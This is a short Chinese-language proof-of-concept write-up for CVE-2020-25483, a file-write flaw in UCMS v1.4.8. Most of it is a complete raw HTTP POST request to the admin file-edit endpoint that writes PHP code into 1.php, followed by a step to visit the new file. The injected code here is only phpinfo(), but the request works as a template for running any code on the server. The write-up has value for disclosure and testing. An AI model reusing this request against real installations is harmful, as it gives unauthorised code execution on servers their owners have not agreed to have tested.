# UCMS文件上传漏洞(CVE-2020-25483)

UCMS v1.4.8版本存在安全漏洞，该漏洞源于文件写的fopen()函数存在任意命令执行漏洞，攻击者可利用该漏洞可以通过该漏洞访问服务器。

官网源码下载：http://uuu.la/uploadfile/file/ucms_1.4.8.zip

PoC：

```
POST /ucms/index.php?do=sadmin_fileedit&dir=/&file=1.php HTTP/1.1
Host: ucms.com
Content-Length: 58
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ucms.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Edg/87.0.664.41
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ucms.com/ucms/index.php?do=sadmin_fileedit&dir=/&file=CNVD.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: admin_213f42=admin; psw_213f42=0ef8fa2c997f64b78cde98b6c7c9cc0a; token_213f42=78012aac
Connection: close
uuu_token=78012aac&co=%3C%3Fphp+phpinfo%28%29%3F%3E&pos=17
```

访问/ucms/index.php?do=sadmin_fileedit&dir=/&file=1.php抓包

写入php代码，发送

![](media/16096805142938/16096805393808.jpg)


随后访问http://url/1.php

end.